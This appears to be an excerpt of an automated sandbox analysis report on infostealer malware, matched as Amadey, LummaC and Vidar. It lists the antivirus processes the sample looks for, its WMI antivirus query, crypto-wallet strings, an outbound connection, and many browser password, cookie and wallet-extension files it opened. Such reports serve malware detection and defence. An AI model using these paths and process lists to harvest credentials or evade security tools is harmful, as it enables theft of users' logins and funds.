                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bullguard.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwengine.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k7tsmngr.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sbamsvc.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgnsx.exe
                            Source: explorer.exe, 00000017.00000003.3848708673.000000000086D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3308227661.0000000000885000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2666291230.0000000000885000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2667491067.0000000000887000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                            Source: cad620f7d1.exe, 00000024.00000003.3053058436.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000002.3122773825.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3093791267.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3038819707.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3054039751.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3036675220.0000000000BA5000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3094363782.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: savservice.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsmon.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a2service.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsma32.exe
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Amadeys stealer DLL
                            Source: Yara matchFile source: 0.2.file.exe.ec0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.skotes.exe.700000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.2321951308.00000000047B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000003.1765294388.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1731033404.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Yara detected LummaC Stealer
                            Source: Yara matchFile source: Process Memory Space: cad620f7d1.exe PID: 6976, type: MEMORYSTR
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Yara detected Vidar stealer
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: cad620f7d1.exe, 00000024.00000003.2879866062.0000000000B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                            Source: cad620f7d1.exe, 00000024.00000003.2879866062.0000000000B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                            Source: RegAsm.exeString found in binary or memory: 21YszL9NVZaL+QaS0I5/wxFJiLxoEw2MK29vrW2JshspteAHZBgGK3mu25vejF0cGEu43Ms1EzJpPX31x3VOO0uYzvCXZHmlBWcAFMy+DVgKd6bRHkzTZsh1DrwO3Y43L7pldcJO3w7L+YvTzLJaxxfTeYaYfc/5y9ZOsER0zGfxLLwZT7gM1ov1xdOBGJtvYE9IvslVESuJvgzOTLnMSzm6qN6dmnKa2dvbqy2yVxwYWaCxPF/dyZFkTb0Orc456tDm
                            Source: cad620f7d1.exe, 00000024.00000003.2879866062.0000000000B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                            Source: cad620f7d1.exe, 00000024.00000003.2879866062.0000000000B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                            Source: cad620f7d1.exe, 00000024.00000003.2879866062.0000000000B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                            Source: cad620f7d1.exe, 00000024.00000003.2879866062.0000000000B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                            Source: powershell.exe, 0000000A.00000002.2587367775.00000190EDCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                            Leaks process information
                            Source: global trafficTCP traffic: 192.168.2.4:49935 -> 141.8.192.141:80
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
